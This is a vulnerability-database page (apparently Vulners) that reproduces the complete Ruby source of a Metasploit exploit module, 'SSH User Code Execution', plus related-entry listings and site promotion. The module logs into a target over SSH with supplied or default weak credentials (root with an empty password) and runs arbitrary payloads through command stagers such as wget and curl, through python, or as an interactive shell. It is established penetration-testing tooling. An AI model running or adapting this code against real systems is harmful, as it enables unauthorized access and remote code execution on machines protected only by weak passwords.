Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SSH User Code Execution

🗓️ 17 Oct 2014 16:47:33Reported by Spencer McIntyre, Brandon KnightType 
metasploit
 metasploit🔗 www.rapid7.com👁 80 Views

SSH User Code Execution module for executing commands and running payloads via SSH on target systems with specific payload requirements

Related
Code
ReporterTitlePublishedViews
Family
0day.today		SSH User Code Execution Vulnerability
16 May 201300:00
zdt
0day.today		Varnish Cache CLI Interface Remote Code Execution Exploit
21 Dec 201400:00
zdt
0day.today		SSH - User Code Execution Exploit
23 Mar 201700:00
zdt
Tenable Nessus		Unpassworded '4Dgifts' Account
20 Feb 200300:00
nessus
Tenable Nessus		Default Password '666666' for '666666' Account
28 Oct 201600:00
nessus
Tenable Nessus		Default Password '888888' for '888888' Account
28 Oct 201600:00
nessus
Tenable Nessus		Unprotected 'admin' Account
28 Oct 201600:00
nessus
Tenable Nessus		Default Password 'password' for 'admin1' Account
28 Oct 201600:00
nessus
Tenable Nessus		Default Password '1234' for 'administrator' Account
28 Oct 201600:00
nessus
Tenable Nessus		Default Password 'meinsm' for 'Administrator' Account
28 Oct 201600:00
nessus
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::SSH

  attr_accessor :ssh_socket

  def initialize
    super(
      'Name'             => 'SSH User Code Execution',
      'Description'      => %q(
        This module connects to the target system and executes the necessary
        commands to run the specified payload via SSH. If a native payload is
        specified, an appropriate stager will be used.
      ),
      'Author'           => ['Spencer McIntyre', 'Brandon Knight'],
      'References'       =>
        [
          [ 'CVE', '1999-0502'] # Weak password
        ],
      'License'          => MSF_LICENSE,
      'Privileged'       => true,
      'DefaultOptions'   =>
        {
          'PrependFork'  => 'true',
          'EXITFUNC'     => 'process'
        },
      'Payload'          =>
        {
          'Space'        => 800000,
          'BadChars'     => "",
          'DisableNops'  => true
        },
      'Platform'         => %w[linux osx unix python bsd],
      'CmdStagerFlavor'  => %w[bourne echo printf wget],
      'Targets'          =>
        [
          [
            'Linux Command',
            {
              'Arch'     => ARCH_CMD,
              'Platform' => 'linux'
            }
          ],
          [
            'Linux x86',
            {
              'Arch'     => ARCH_X86,
              'Platform' => 'linux'
            }
          ],
          [
            'Linux x64',
            {
              'Arch'     => ARCH_X64,
              'Platform' => 'linux'
            }
          ],
          [
            'Linux armle',
            {
              'Arch'     => ARCH_ARMLE,
              'Platform' => 'linux'
            }
          ],
          [
            'Linux mipsle',
            {
              'Arch'             => ARCH_MIPSLE,
              'Platform'         => 'linux',
              'CmdStagerFlavor'  => %w[curl wget]
            }
          ],
          [
            'Linux mipsbe',
            {
              'Arch'             => ARCH_MIPSBE,
              'Platform'         => 'linux',
              'CmdStagerFlavor'  => %w[wget]
            }
          ],
          [
            'Linux aarch64',
            {
              'Arch'     => ARCH_AARCH64,
              'Platform' => 'linux'
            }
          ],
          [
            'OSX x86',
            {
              'Arch'             => ARCH_X86,
              'Platform'         => 'osx',
              'CmdStagerFlavor'  => %w[curl wget]
            }
          ],
          [
            'OSX x64',
            {
              'Arch'             => ARCH_X64,
              'Platform'         => 'osx',
              'CmdStagerFlavor'  => %w[curl wget]
            }
          ],
          [
            'BSD x86',
            {
              'Arch'             => ARCH_X86,
              'Platform'         => 'bsd',
              'CmdStagerFlavor'  => %w[printf curl wget]
            }
          ],
          [
            'BSD x64',
            {
              'Arch'             => ARCH_X64,
              'Platform'         => 'bsd',
              'CmdStagerFlavor'  => %w[printf curl wget]
            }
          ],
          [
            'Python',
            {
              'Arch'     => ARCH_PYTHON,
              'Platform' => 'python'
            }
          ],
          [
            'Unix Cmd',
            {
              'Arch'     => ARCH_CMD,
              'Platform' => 'unix'
            }
          ],
          [
            'Interactive SSH',
            {
              'DefaultOptions' => {
                'PAYLOAD' => 'generic/ssh/interact',
                'WfsDelay' => 5
              },
              'Payload' => {
                'Compat' => {
                  'PayloadType' => 'ssh_interact',
                }
              }
            }
          ]
        ],
      'DefaultTarget'    => 0,
      # For the CVE
      'DisclosureDate'   => 'Jan 01 1999',
      'Notes'            =>
        {
          'Stability'   => [ CRASH_SAFE, ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
          'Reliability' => [ REPEATABLE_SESSION, ],
        },
    )

    register_options(
      [
        OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]),
        OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]),
        Opt::RHOST(),
        Opt::RPORT(22)
      ]
    )

    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false])
      ]
    )
  end

  def execute_command(cmd, opts = {})
    vprint_status("Executing #{cmd}")
    begin
      Timeout.timeout(3.5) { ssh_socket.exec!(cmd) }
    rescue Timeout::Error
      print_warning('Timed out while waiting for command to return')
      @timeout = true
    end
  end

  def do_login(ip, user, pass, port)

    opt_hash = ssh_client_defaults.merge({
      auth_methods: ['password', 'keyboard-interactive'],
      port: port,
      password: pass
    })

    opt_hash[:verbose] = :debug if datastore['SSH_DEBUG']

    begin
      self.ssh_socket = Net::SSH.start(ip, user, opt_hash)
    rescue Rex::ConnectionError
      fail_with(Failure::Unreachable, 'Disconnected during negotiation')
    rescue Net::SSH::Disconnect, ::EOFError
      fail_with(Failure::Disconnected, 'Timed out during negotiation')
    rescue Net::SSH::AuthenticationFailed
      fail_with(Failure::NoAccess, 'Failed authentication')
    rescue Net::SSH::Exception => e
      fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
    end

    fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket
  end

  def binary_exists(binary, platform: nil)
    Msf::Sessions::CommandShell.binary_exists(binary, platform: platform, &method(:execute_command))
  end

  def execute_python
    python_binary = binary_exists('python', platform: 'unix')
    python_binary ||= binary_exists('python3', platform: 'unix')
    python_binary ||= binary_exists('python2', platform: 'unix')
    fail_with(Failure::NoTarget, 'Python was not found on the target system') if python_binary.nil?

    execute_command("echo \"#{payload.encoded}\" | #{python_binary}")
  end

  def exploit
    do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])

    if target.name == 'Interactive SSH'
      handler(ssh_socket)
      return
    end

    print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...")

    case target['Platform']
    when 'python'
      execute_python
    when 'unix'
      execute_command(payload.encoded)
    else
      if target['Arch'] == ARCH_CMD
        execute_command(payload.encoded)
      else
        execute_cmdstager(linemax: 500)
      end
    end

    @timeout ? ssh_socket.shutdown! : ssh_socket.close
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 May 2023 15:47Current
7.1High risk
Vulners AI Score7.1
CVSS 27.5
EPSS0.37089
metasploitcode executionsshvulnerabilitylinuxosxunixpythonbsdpayloadcommand stagerremotecve-1999-0502spencer mcintyrebrandon knight
80